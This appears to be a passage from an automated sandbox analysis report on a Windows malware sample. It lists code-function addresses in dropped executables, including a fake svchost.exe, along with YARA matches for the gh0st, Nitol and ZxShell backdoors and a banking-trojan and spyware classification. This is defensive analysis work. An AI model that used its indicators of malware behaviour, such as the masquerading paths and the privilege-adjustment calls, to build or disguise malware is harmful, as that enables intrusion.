Source: C:\Windows\Temp\server.exe	Code function: 3_2_10037810	3_2_10037810
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10052816	3_2_10052816
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1005401A	3_2_1005401A
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10044020	3_2_10044020
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10051029	3_2_10051029
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10043030	3_2_10043030
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10037040	3_2_10037040
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10041850	3_2_10041850
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002F060	3_2_1002F060
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001D080	3_2_1001D080
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10036080	3_2_10036080
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002C090	3_2_1002C090
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10045090	3_2_10045090
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002C8A0	3_2_1002C8A0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002F8B0	3_2_1002F8B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100380B0	3_2_100380B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100348C0	3_2_100348C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100388C0	3_2_100388C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003F0C0	3_2_1003F0C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100678C0	3_2_100678C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100350E0	3_2_100350E0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100398F0	3_2_100398F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100518F1	3_2_100518F1
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10035900	3_2_10035900
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10040940	3_2_10040940
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10042170	3_2_10042170
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001C990	3_2_1001C990
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002E9A0	3_2_1002E9A0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100321B0	3_2_100321B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100369B0	3_2_100369B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100229C0	3_2_100229C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100289C0	3_2_100289C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004C1D0	3_2_1004C1D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100579D0	3_2_100579D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10030200	3_2_10030200
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10034200	3_2_10034200
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10042A00	3_2_10042A00
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10041220	3_2_10041220
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10017A30	3_2_10017A30
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003CA30	3_2_1003CA30
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10043A30	3_2_10043A30
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10031A40	3_2_10031A40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001DA50	3_2_1001DA50
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10040A50	3_2_10040A50
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10018A70	3_2_10018A70
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10014A70	3_2_10014A70
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003EA80	3_2_1003EA80
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10054ABB	3_2_10054ABB
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100312D0	3_2_100312D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003A2D0	3_2_1003A2D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002E2E0	3_2_1002E2E0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10032AE0	3_2_10032AE0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001E2F0	3_2_1001E2F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100682F0	3_2_100682F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10037B10	3_2_10037B10
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003C310	3_2_1003C310
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003BB20	3_2_1003BB20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004A320	3_2_1004A320
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10041B20	3_2_10041B20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10030B40	3_2_10030B40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004F34F	3_2_1004F34F
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002C350	3_2_1002C350
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10017360	3_2_10017360
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10038360	3_2_10038360
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001D370	3_2_1001D370
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003D390	3_2_1003D390
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001ABA0	3_2_1001ABA0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100393A0	3_2_100393A0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100563A0	3_2_100563A0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004FBC5	3_2_1004FBC5
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004B3C0	3_2_1004B3C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100233F0	3_2_100233F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003DBF0	3_2_1003DBF0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100413F0	3_2_100413F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10053418	3_2_10053418
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1005141B	3_2_1005141B
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10042420	3_2_10042420
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001543E	3_2_1001543E
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10040C40	3_2_10040C40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10034C70	3_2_10034C70
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001C480	3_2_1001C480
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001ACA0	3_2_1001ACA0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100364B0	3_2_100364B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002DCC0	3_2_1002DCC0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10035CC0	3_2_10035CC0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100554E0	3_2_100554E0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100334F0	3_2_100334F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100544FD	3_2_100544FD
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003AD00	3_2_1003AD00
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10015D10	3_2_10015D10
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001CD20	3_2_1001CD20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10035540	3_2_10035540
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003FD40	3_2_1003FD40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10034560	3_2_10034560
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1002C570	3_2_1002C570
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10051DC7	3_2_10051DC7
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003CDC0	3_2_1003CDC0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100415C0	3_2_100415C0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100145D0	3_2_100145D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004A5D0	3_2_1004A5D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10016DE0	3_2_10016DE0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10039DE0	3_2_10039DE0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1004CDE0	3_2_1004CDE0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100505F7	3_2_100505F7
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10041DF0	3_2_10041DF0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10040E00	3_2_10040E00
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10037E10	3_2_10037E10
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10038610	3_2_10038610
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001DE40	3_2_1001DE40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001D650	3_2_1001D650
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10038E50	3_2_10038E50
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10022E60	3_2_10022E60
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10064E70	3_2_10064E70
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001568D	3_2_1001568D
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003B690	3_2_1003B690
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003C6A0	3_2_1003C6A0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100656D0	3_2_100656D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10066EE0	3_2_10066EE0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10033EF0	3_2_10033EF0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003F700	3_2_1003F700
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10057F20	3_2_10057F20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10013730	3_2_10013730
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10063F30	3_2_10063F30
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10063760	3_2_10063760
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10046F90	3_2_10046F90
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10040FC0	3_2_10040FC0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1001BFD0	3_2_1001BFD0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_1003A7D0	3_2_1003A7D0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100287F0	3_2_100287F0
Source: C:\Windows\Temp\v5.exe	Code function: 4_2_00407470	4_2_00407470
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00433020	5_2_00433020
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00458C58	5_2_00458C58
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00452655	5_2_00452655
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00447B9C	5_2_00447B9C
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0044DDAB	5_2_0044DDAB
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00443ED8	5_2_00443ED8
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_004023C9	8_2_004023C9
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10037810	8_2_10037810
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10052816	8_2_10052816
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1005401A	8_2_1005401A
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10044020	8_2_10044020
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10051029	8_2_10051029
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10043030	8_2_10043030
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10037040	8_2_10037040
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10041850	8_2_10041850
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002F060	8_2_1002F060
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001D080	8_2_1001D080
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10036080	8_2_10036080
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002C090	8_2_1002C090
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10045090	8_2_10045090
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002C8A0	8_2_1002C8A0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002F8B0	8_2_1002F8B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100380B0	8_2_100380B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100348C0	8_2_100348C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100388C0	8_2_100388C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003F0C0	8_2_1003F0C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100678C0	8_2_100678C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100350E0	8_2_100350E0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100398F0	8_2_100398F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100518F1	8_2_100518F1
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10035900	8_2_10035900
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10040940	8_2_10040940
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10042170	8_2_10042170
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001C990	8_2_1001C990
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002E9A0	8_2_1002E9A0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100321B0	8_2_100321B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100369B0	8_2_100369B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100229C0	8_2_100229C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100289C0	8_2_100289C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004C1D0	8_2_1004C1D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100579D0	8_2_100579D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10030200	8_2_10030200
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10034200	8_2_10034200
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10042A00	8_2_10042A00
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10041220	8_2_10041220
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10017A30	8_2_10017A30
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003CA30	8_2_1003CA30
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10043A30	8_2_10043A30
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10031A40	8_2_10031A40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001DA50	8_2_1001DA50
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10040A50	8_2_10040A50
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10018A70	8_2_10018A70
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10014A70	8_2_10014A70
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003EA80	8_2_1003EA80
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10054ABB	8_2_10054ABB
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100312D0	8_2_100312D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003A2D0	8_2_1003A2D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002E2E0	8_2_1002E2E0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10032AE0	8_2_10032AE0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001E2F0	8_2_1001E2F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100682F0	8_2_100682F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10037B10	8_2_10037B10
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003C310	8_2_1003C310
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003BB20	8_2_1003BB20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004A320	8_2_1004A320
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10041B20	8_2_10041B20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10030B40	8_2_10030B40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004F34F	8_2_1004F34F
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002C350	8_2_1002C350
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10017360	8_2_10017360
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10038360	8_2_10038360
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001D370	8_2_1001D370
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003D390	8_2_1003D390
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001ABA0	8_2_1001ABA0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100393A0	8_2_100393A0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100563A0	8_2_100563A0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004FBC5	8_2_1004FBC5
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004B3C0	8_2_1004B3C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100233F0	8_2_100233F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003DBF0	8_2_1003DBF0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100413F0	8_2_100413F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10053418	8_2_10053418
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1005141B	8_2_1005141B
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10042420	8_2_10042420
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001543E	8_2_1001543E
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10040C40	8_2_10040C40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10034C70	8_2_10034C70
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001C480	8_2_1001C480
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001ACA0	8_2_1001ACA0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100364B0	8_2_100364B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002DCC0	8_2_1002DCC0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10035CC0	8_2_10035CC0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100554E0	8_2_100554E0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100334F0	8_2_100334F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100544FD	8_2_100544FD
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003AD00	8_2_1003AD00
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10015D10	8_2_10015D10
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001CD20	8_2_1001CD20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10035540	8_2_10035540
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003FD40	8_2_1003FD40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10034560	8_2_10034560
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002C570	8_2_1002C570
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10051DC7	8_2_10051DC7
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003CDC0	8_2_1003CDC0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100415C0	8_2_100415C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100145D0	8_2_100145D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004A5D0	8_2_1004A5D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10016DE0	8_2_10016DE0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10039DE0	8_2_10039DE0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004CDE0	8_2_1004CDE0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100505F7	8_2_100505F7
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10041DF0	8_2_10041DF0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10040E00	8_2_10040E00
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10037E10	8_2_10037E10
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10038610	8_2_10038610
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001DE40	8_2_1001DE40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001D650	8_2_1001D650
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10038E50	8_2_10038E50
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10022E60	8_2_10022E60
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10064E70	8_2_10064E70
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001568D	8_2_1001568D
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003B690	8_2_1003B690
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003C6A0	8_2_1003C6A0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100656D0	8_2_100656D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10066EE0	8_2_10066EE0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10033EF0	8_2_10033EF0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003F700	8_2_1003F700
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10057F20	8_2_10057F20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10013730	8_2_10013730
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10063F30	8_2_10063F30
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10063760	8_2_10063760
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10046F90	8_2_10046F90
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10040FC0	8_2_10040FC0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001BFD0	8_2_1001BFD0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003A7D0	8_2_1003A7D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100287F0	8_2_100287F0

Found potential string decryption / allocating functions

Source: C:\Windows\Temp\ .exe	Code function: String function: 00401B10 appears 2588 times
Source: C:\Windows\Temp\ .exe	Code function: String function: 0044991C appears 59 times
Source: C:\Windows\Temp\ .exe	Code function: String function: 00456F8E appears 53 times
Source: C:\Windows\Temp\ .exe	Code function: String function: 00454F3B appears 2661 times
Source: C:\Windows\Temp\ .exe	Code function: String function: 00459697 appears 31 times
Source: C:\Windows\Temp\ .exe	Code function: String function: 004483B0 appears 122 times

Sample file is different than original file name gathered from version info

Source: G3izWAY3Fa.exe, 00000000.00000002.1327850381.000000000297D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystemTool.exe8 vs G3izWAY3Fa.exe
Source: G3izWAY3Fa.exe, 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSystemTool.exe8 vs G3izWAY3Fa.exe

Uses 32bit PE files

Source: G3izWAY3Fa.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Yara signature match

Source: dump.pcap, type: PCAP	Matched rule: gh0st author = https://github.com/jackcr/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: ZxShell_Related_Malware_CN_Group_Jul17_2 date = 2017-07-08, hash1 = 204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e, author = Florian Roth, description = Detects a ZxShell related sample from a CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: ZxShell_Related_Malware_CN_Group_Jul17_2 date = 2017-07-08, hash1 = 204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e, author = Florian Roth, description = Detects a ZxShell related sample from a CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: gh0st author = https://github.com/jackcr/
Source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY	Matched rule: gh0st author = https://github.com/jackcr/

Source: v5.exe, 00000002.00000002.1330252488.000000000075A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: u.sLN

Source: classification engine

Classification label: mal84.spre.bank.troj.spyw.evad.winEXE@113/11@12/4

Source: C:\Windows\Temp\server.exe	Code function: 3_2_10011F80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,	3_2_10011F80
